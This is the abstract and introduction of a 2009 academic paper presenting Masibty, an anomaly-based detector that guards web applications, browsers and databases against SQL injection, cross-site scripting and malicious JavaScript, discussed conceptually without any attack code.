Integrated Detection of Attacks Against Browsers, Web Applications and Databases C. Criscione, G. Salvaneschi, F. Maggi, S. Zanero Dipartimento di Elettronica e Informazione — Politecnico di Milano Abstract—Anomaly-based techniques were exploited success- fully to implement protection mechanisms for various systems. Recently, these approaches have been ported to the web domain under the name of “web application anomaly detectors” (or firewalls) with promising results. In particular, those capable of automatically building specifications, or models, of the pro- tected application by observing its traffic (e.g., network packets, system calls, or HTTP requests and responses) are particularly interesting, since they can be deployed with little effort. Typically, the detection accuracy of these systems is signif- icantly influenced by the model building phase (often called training), which clearly depends upon the quality of the observed traffic, which should resemble the normal activity of the protected application and must be also free from attacks. Otherwise, detection may result in significant amounts of false positives (i.e., benign events flagged as anomalous) and negatives (i.e., undetected threats). In this work we describe Masibty, a web application anomaly detector that have some interesting properties. First, it requires the training data not to be attack-free. Secondly, not only it protects the monitored application, it also detects and blocks malicious client-side threats before they are sent to the browser. Third, Masibty intercepts the queries before they are sent to the database, correlates them with the corresponding HTTP requests and blocks those deemed anomalous. Both the accuracy and the performance have been evaluated on real-world web applications with interesting results. The system is almost not influenced by the presence of attacks in the training data and shows only a negligible amount of false positives, although this is paid in terms of a slight performance overhead. I. I NTRODUCTION In the field of computer security, without doubts the pro- tection of web applications against attacks is a critical and current research issue. Web applications are gaining more and more popularity, due to their ease of use and development and to the ubiquity of the Internet — and in particular, the Web — in every day’s life [1]. At the same time, they are usually developed with less attention to security constraints, due to different development models being employed; as a result, they have become the prime source of vulnerabilities in enterprise information systems. During 2006, the Web Application Security Consortium reported 148,029 different vulnerabilities affecting web applications: this translates to roughly 85% of the audited applications having at least one vulnerability [2]. Similarly, Symantec reported an increase equal to 125% of web application vulnerabilities between 2007 and 2008 [3]. Various taxonomies have been proposed for web threats, such as [4], [5], [6]. SQL injections seem to be the most commonly exploited attack vector. The goal of such attacks is usually either to control the server, or to obtain sensitive data. However, the current trend in web application attacks is the ever increasing rate of attacks carried out to compromise a host and use it for the distribution of malware (e.g., spy-ware, bots) or to deploy a phishing or spamming kit [7]. This does not come as a surprise, considering that PhishTank.com, for example, reports about 130,000 confirmed phishing websites over the same year. This shows how prevalent client-side attacks, such as the very common cross-site scripting, are becoming. This creates a need for protection mechanisms to prevent the malicious content from being deployed on a host that runs a vulnerable web application. In addition, such a mechanism should avoid further spreading of the malicious content by protecting the visitors of a site already compromised. In this scenario, the challenge is that often attacks are not brought against known, off-the-shelf targets, but against custom appli- cations. As such, they are by any definition zero-day attacks (i.e., that exploit vulnerabilities that are unknown before their use). This makes substantially ineffective the traditional and well developed concept of misuse detection, which is based on the exhaustive enumeration of all the known threats. On the other hand, anomaly-based techniques have the desirable property of protecting also against totally novel attacks. In fact, they model the normal behavior of the protected system (e.g., a web application) and detect deviations, called anomalies — under the assumption that attacks always cause anomalies. In this context, the term “normal behavior” typically refers to the set of features (e.g., the frequency of certain bytes in a network packet, the length of a string variable) extracted from the traffic, and then combined in such a way to build the models exploited to recognize anomalies (e.g., unexpected bytes frequencies, an out of bounds string length). In this work, we describe Masibty, a web application anomaly detector that attempt to mitigate the two aforemen- tioned major drawbacks (i.e., false positives due to inaccurate models and false negatives due to the presence of attacks in the training). Masibty is able to detect a real-world threats against the clients (e.g., malicious JavaScript code, trying to exploit browser vulnerabilities), the application (e.g., cross-site script- ing, permanent content injection), and the database layer (e.g., SQL injection). A prototype of Masibty is evaluated on a set of real-world attacks against publicly available applications, using both simple and mutated versions of exploits, in order to assess the resilience to evasion. We can identify three key improvements in this paper: 2009 European Conference on Computer Network Defense 978-0-7695-3983-6/09 $26.00 © 2009 IEEE DOI 10.1109/EC2ND.2009.13 37